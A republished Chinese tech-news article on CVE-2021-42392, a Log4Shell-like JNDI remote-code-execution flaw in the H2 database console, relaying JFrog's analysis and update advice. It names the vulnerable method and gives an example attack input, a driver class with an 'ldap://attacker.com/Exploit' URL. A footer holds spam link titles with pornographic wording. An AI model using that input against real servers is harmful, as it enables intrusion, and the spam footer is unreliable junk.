一区二区三区在线-一区二区三区亚洲视频-一区二区三区亚洲-一区二区三区午夜-一区二区三区四区在线视频-一区二区三区四区在线免费观看

服務器之家:專注于服務器技術及軟件下載分享
分類導航

云服務器|WEB服務器|FTP服務器|郵件服務器|虛擬主機|服務器安全|DNS服務器|服務器知識|Nginx|IIS|Tomcat|

服務器之家 - 服務器技術 - 服務器安全 - 警告!與Log4Shell相似的Java漏洞出現了

警告!與Log4Shell相似的Java漏洞出現了

2022-01-10 23:29新浪科技咪貝2019 服務器安全

安全研究人員警告稱,一個最新的嚴重的Java錯誤,其本質與目前在全球范圍內利用的臭名昭著的 Log4Shell 漏洞相同 。

警告!與Log4Shell相似的Java漏洞出現了

安全研究人員警告稱,一個最新的嚴重的Java錯誤,其本質與目前在全球范圍內利用的臭名昭著的 Log4Shell 漏洞相同 。

CVE-2021-42392 尚未在國家漏洞數據庫 (NVD) 中正式發布,但據軟件企業內JFrog 稱,它影響了流行的H2 Java SQL 數據庫的控制臺。

這家安全公司提醒,任何目前運行的暴露于其 LAN 或 WAN 的 H2 控制臺的組織立即將數據庫更新到 2.0.206 版本,否則攻擊者可能會利用它進行未經身份驗證的遠程代碼執行 (RCE)。

與 Log4Shell 一樣,該錯誤與 JNDI(Java 命名和目錄接口)“遠程類加載”有關。JNDI 是一種為 Java 應用程序提供命名和目錄功能的 API。這意味著如果攻擊者可以將惡意 URL 獲取到 JNDI 查找中,它就可以啟用 RCE。

“簡而言之,根本原因類似于 Log4Shell——H2 數據庫框架中的多個代碼路徑將未經過濾的攻擊者控制的 URL 傳遞給 javax.naming.Context.lookup 函數,該函數允許遠程代碼庫加載(AKA Java 代碼注入 AKA遠程代碼執行),” JFrog 解釋道。

“具體來說,org.h2.util.JdbcUtils.getConnection 方法以驅動類名和數據庫 URL 作為參數。如果驅動程序的類可分配給 javax.naming.Context 類,則該方法會從中實例化一個對象并調用其查找方法。”

提供諸如“javax.naming.InitialContext”之類的驅動程序類和像 ldap://attacker.com/Exploit 這樣簡單的 URL 將導致遠程代碼執行。

JFrog 表示,該漏洞特別危險,因為 H2 數據庫包特別受歡迎。該公司聲稱,它是前 50 個最受歡迎的 Maven 軟件包之一,擁有近 7000 個工件依賴項。

但是,有一些原因導致利用不會像 Log4Shell 那樣廣泛。一方面,它具有“直接影響范圍”,這意味著易受攻擊的服務器應該更容易找到。其次,在大多數 H2 發行版中,控制臺只監聽 localhost 連接,這意味著默認設置是不可利用的。

“許多供應商可能正在運行 H2 數據庫,但沒有運行 H2 控制臺,雖然除了控制臺之外還有其他向量可以利用這個問題,但這些其他向量是依賴于上下文的,不太可能暴露給遠程攻擊者。”JFrog 補充道。

原文鏈接:https://t.cj.sina.com.cn/articles/view/5095232218/12fb312da019012a18

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: 欧美vpswindowssex 欧美va在线高清 | a v在线男人的天堂观看免费 | 久久久乱码精品亚洲日韩 | 国产精品密播放国产免费看 | 私人黄色影院 | xxoo做爰猛烈动态 | 国产精品久久久久久福利 | 无耻之徒第十一季在线观看 | 高贵女王调奴vk | yellow最新视频2019 | 亚洲国产精品综合久久一线 | 思思久久精品在热线热 | 2015小明台湾永久区域免费 | 久久精品动漫网一区二区 | 91在线精品国产 | 9999热视频 | 亚洲精品视频免费在线观看 | 日本视频免费在线播放 | 无限在线观看视频大全免费高清 | 国产精品第2页 | 国产实拍会所女技师在线 | 国产综合网站 | 日韩免费视频一区 | 亚洲国产精品无码中文在线 | 国产精品久久香蕉免费播放 | а天堂中文最新版在线 | 视频亚洲一区 | 精品久久久噜噜噜久久7 | 青青青在线视频播放 | 久久久无码精品亚洲A片猫咪 | 亚洲精品一二三四 | 好深快点再快点好爽视频 | 无码精品一区二区三区免费视频 | 久久国产精品无码视欧美 | 欧美爽妇 | 黄片毛片| 91传媒制片厂制作传媒破解版 | 亚洲七七久久综合桃花 | tobu8在线观看免费高清 | 欧美在线高清 | 国产精品视频二区不卡 |